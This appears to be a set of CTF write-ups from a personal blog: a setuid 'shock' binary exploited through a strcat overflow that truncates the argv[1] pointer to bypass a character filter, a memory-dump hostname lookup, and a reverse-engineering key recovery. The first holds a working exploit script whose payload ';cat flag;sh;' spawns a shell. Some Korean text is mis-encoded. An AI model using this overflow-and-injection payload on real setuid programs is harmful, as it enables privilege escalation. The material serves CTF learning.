A 64-bit ELF binary with the setuid bit set.




Briefly analysing the decompiled code:

First the program enters sub_40075c(), which clears the environment variable area. It then checks whether argv[1] is present and, if so, appends argv[1] to command with strcat(). No length check is done on this copy, so a stack overflow occurs. Next it scans the input for special characters through __ctype_b_loc(), and if none are present it runs the contents of command with system().





ASLR and NX are enabled, and a stack canary is present as well. The canary does not block this attack: the overflow only has to reach the saved argv[1] pointer, and system() runs before the function returns and the canary is ever checked.


Looking at the for loop, the program computes strlen(argv[1]) and checks each of those bytes for special characters, and the argv[1] pointer it reads from is itself stored on the stack, above command.

In other words, the overflow reaches the argv[1] pointer and can change it.

To overwrite exactly that pointer we need the offset from &command to the stack slot holding argv[1].





At the strcat() call: $rsi = argv[1] address (source)

$rdi = &command (destination)





The argv[1] pointer is stored at 0x7fffef7f1190.

offset = 0x7fffef7f1190 - $rdi (0x7fffef7f0f80) = 528 bytes

However, command already holds the string "id " before strcat() runs, so those 3 bytes must be subtracted: 525 bytes of argv[1] data is the exact amount that reaches the pointer.





"A" * 525 + "BBBBBB" => the argv[1] pointer is overwritten with the B's, confirming we control it.


There are several ways to control the value strlen(argv[1]) returns:

[*] Redirect the argv[1] pointer into the environment area that was zeroed out

[*] Redirect it into the vsyscall page, which sits at a fixed address even on 64-bit

[*] Size the input to the pointer exactly, e.g. 521 bytes + ";sh;", so that the terminating "\x00" strcat() appends lands on the low byte of the pointer

With the third method the pointer is only truncated (its low byte becomes 0x00), so strlen() is taken from that rounded-down address rather than from the real argv[1]. If a NUL sits there the loop runs zero times and the special-character check never sees the ";", while system() still receives the full string from command.




- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  exploit.py  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


import subprocess


# argv[1] must be exactly 525 bytes so that the NUL strcat() appends lands on
# the low byte of the saved argv[1] pointer (offset 528 minus len("id ")).
command = ";cat flag;sh;"

payload = "A" * (525 - len(command)) + command


# Pass the payload as a single argv[1]. With os.system() the ';' characters
# would be interpreted by the calling shell and never reach the setuid binary.
subprocess.call(["./shock", payload])


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
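To make the arithmetic above concrete, here is an added example (not the challenge's code and not the author's exploit) that replays strcat(command, argv[1]) on a byte model of the frame the writeup measured: "id " at the start of command and the saved argv[1] pointer 528 bytes above it. The pointer's value (ARGV1_STR), the set of characters the __ctype_b_loc() loop rejects, and the assumption that the truncated pointer lands on zeroed memory are all assumptions made for the model. The hardened() variant shows what a bounded copy plus a check on the copied bytes, rather than on whatever argv[1] points at, does with the same input.

```python
import struct
from typing import Optional, Tuple

# Frame layout measured in the writeup's gdb session.
PREFIX = b"id "              # command[] already holds "id " before strcat()
PTR_OFFSET = 528             # 0x7fffef7f1190 (argv[1] slot) - 0x7fffef7f0f80 (&command)
ARGV1_STR = 0x7fffef7f2d40   # assumed value of the saved argv[1] pointer

# Assumed stand-in for the __ctype_b_loc() filter: reject shell punctuation.
SHELL_META = frozenset(b";|&`$<>()\n")


def build_argv1(command: bytes) -> bytes:
    """Pad `command` so PREFIX + argv[1] ends exactly at the pointer slot."""
    pad = PTR_OFFSET - len(PREFIX) - len(command)
    if pad < 0:
        raise ValueError("command does not fit below the argv[1] slot")
    return b"A" * pad + command


def filter_passes(s: bytes) -> bool:
    """Model of the for loop over strlen(argv[1]) bytes."""
    return not any(ch in SHELL_META for ch in s)


def simulate_shock(argv1: bytes) -> Tuple[int, bool, Optional[bytes]]:
    """Replay the vulnerable path.

    Returns (argv[1] pointer after strcat, filter result, bytes reaching
    system()); the last item is None when the filter rejects the input.
    """
    frame = bytearray(PTR_OFFSET + 8)
    frame[:len(PREFIX)] = PREFIX
    struct.pack_into("<Q", frame, PTR_OFFSET, ARGV1_STR)

    # strcat(): copies argv[1] and its terminating NUL with no bound check.
    start = len(PREFIX)
    copy = argv1 + b"\0"
    if start + len(copy) > len(frame):
        frame.extend(b"\0" * (start + len(copy) - len(frame)))
    frame[start:start + len(copy)] = copy

    new_ptr = struct.unpack_from("<Q", frame, PTR_OFFSET)[0]

    # Memory model: only the real argv[1] string is populated. Everything
    # else reads as NUL (assumption: the truncated pointer lands in the
    # region sub_40075c() zeroed, which is what the writeup relies on).
    memory = {ARGV1_STR: argv1 + b"\0"}

    def read_cstring(addr: int) -> bytes:
        for base, blob in memory.items():
            if base <= addr < base + len(blob):
                tail = blob[addr - base:]
                return tail[:tail.index(0)]
        return b""

    checked = read_cstring(new_ptr)          # what the for loop actually scans
    ok = filter_passes(checked)
    cmd = bytes(frame[:frame.index(0)]) if ok else None   # system(command)
    return new_ptr, ok, cmd


def hardened(argv1: bytes, bufsize: int = PTR_OFFSET) -> Optional[bytes]:
    """Bounded copy plus a check on the copied bytes, not on argv[1]."""
    if len(PREFIX) + len(argv1) + 1 > bufsize:
        return None
    buf = PREFIX + argv1
    return buf if filter_passes(buf) else None


if __name__ == "__main__":
    payload = build_argv1(b";cat flag;sh;")
    ptr, ok, cmd = simulate_shock(payload)
    print(f"argv[1] len={len(payload)} ptr=0x{ptr:x} filter_passed={ok}")
    print(f"system() gets {len(cmd)} bytes ending in {cmd[-13:]!r}")
```

With the 525-byte payload the pointer comes back as 0x7fffef7f2d00, the filter scans an empty string, and system() receives all 528 bytes including ";cat flag;sh;". A short ";sh;" leaves the pointer intact and is rejected, and hardened() rejects the long input outright because it no longer fits.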



WRITTEN BY
LuCeT3

ํŒŒ์ผ์„ ๋‹ค์šด ๋ฐ›๊ฒŒ ๋˜๋ฉด 





ta-da, you get a dump file named ch2.dmp!!!


Let's read the challenge!


It says the answer is the workstation hostname (that is, the computer name)! :) Lalala~ Let's go then.


ํ•„์ž๋Š” strings ๋ผ๋Š” ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ’€์–ด๋ณผ ๊ฒƒ์ด๋‹ค.


strings ch2.dmp | grep COMPUTERNAME  <= ์ด๋ ‡๊ฒŒ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•  ๊ฒƒ์ด๋‹ค.





Indeed, that is the answer. It seems hard at first, but it is easy once you think about what the workstation hostname is.
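As an added example (not the author's own method), here is a Python equivalent of the strings | grep COMPUTERNAME step that scans a constructed sample dump for the variable in both plain ASCII and UTF-16LE. The caveat it demonstrates: Windows keeps the process environment block and most registry strings in UTF-16LE, so plain strings, which only looks for 8-bit characters by default, can miss the hostname entirely; on a real dump the wide scan is strings -e l ch2.dmp. The SAMPLE_DUMP bytes are constructed here and are not taken from ch2.dmp.

```python
import re
from typing import Dict, List

# Constructed sample dump (not bytes from ch2.dmp): one ASCII environment
# string, one UTF-16LE string as Windows stores its environment block, and
# some surrounding noise.
SAMPLE_DUMP = (
    b"\x00\x17junk\x00"
    + b"COMPUTERNAME=WIN-LAB01\x00"
    + b"\xff\xfe\x00\x00\x90"
    + "COMPUTERNAME=ANALYST-PC\x00".encode("utf-16-le")
    + b"SystemRoot=C:\\Windows\x00"
)

PRINTABLE = rb"[\x20-\x7e]"


def extract_strings(data: bytes, min_len: int = 4, wide: bool = False) -> List[str]:
    """Runs of printable characters, like `strings` (wide=False) or
    `strings -e l` (wide=True: 16-bit little-endian characters)."""
    if wide:
        pattern = rb"(?:" + PRINTABLE + rb"\x00){%d,}" % min_len
        return [m.group(0).decode("utf-16-le") for m in re.finditer(pattern, data)]
    pattern = PRINTABLE + rb"{%d,}" % min_len
    return [m.group(0).decode("ascii") for m in re.finditer(pattern, data)]


def find_computer_names(dump: bytes, key: str = "COMPUTERNAME=") -> Dict[str, List[str]]:
    """Equivalent of `strings | grep COMPUTERNAME` for both encodings,
    returning only the value after the '=' for each encoding."""
    found: Dict[str, List[str]] = {}
    for label, wide in (("ascii", False), ("utf16le", True)):
        hits = []
        for s in extract_strings(dump, wide=wide):
            idx = s.find(key)
            if idx != -1:
                hits.append(s[idx + len(key):])
        found[label] = hits
    return found


if __name__ == "__main__":
    for enc, names in find_computer_names(SAMPLE_DUMP).items():
        print(f"{enc}: {names}")
```

On the sample the ASCII pass finds WIN-LAB01 and the wide pass finds ANALYST-PC; the ASCII pass alone never sees the second name, which is exactly what happens on a real dump when the hostname only survives in a UTF-16 environment block.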


๋„์~!!!


WRITTEN BY
LuCeT3

,

 

The file command shows it is a 64-bit Linux binary.

I checked IDA's Imports and Strings windows for clues, but they are completely empty...

 

 

 

Running it prompts for a password, as shown below.

Entering an arbitrary password prints the string "Permission denied (password)."

 

 

 

 

Debugging it in IDA shows that the key value is generated at runtime.

The first time I solved this I did it the hard way and dug the key out of memory. Trying to do it faster, I found that if you set a breakpoint where the password is read in, you can see the key already generated in memory.

 

 

 

 

๋ฐ”์ด๋„ˆ๋ฆฌ ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด ์ด๋Ÿฌํ•œ ํ‚ค ๊ฐ’์„ ์ž…๋ ฅ๋ฐ›๊ธฐ ์œ„ํ•ด syscall ์„ ์‚ฌ์šฉํ•œ ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

๊ทธ๋ฆฌ๊ณ  strace๋ฅผ ์ด์šฉํ•˜์—ฌ ์–ด๋””์—์„œ ์ž…๋ ฅ๋ฐ›๋Š”์ง€ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

 

 

 

Set a breakpoint on that code and run; execution stops where the key input is read.

 

 

 

 

 

After reaching the breakpoint, examining the stack shows the generated key, as below.


 

KEY : H4PPY_C0DEGaTE_2014_CU_1N_K0RE4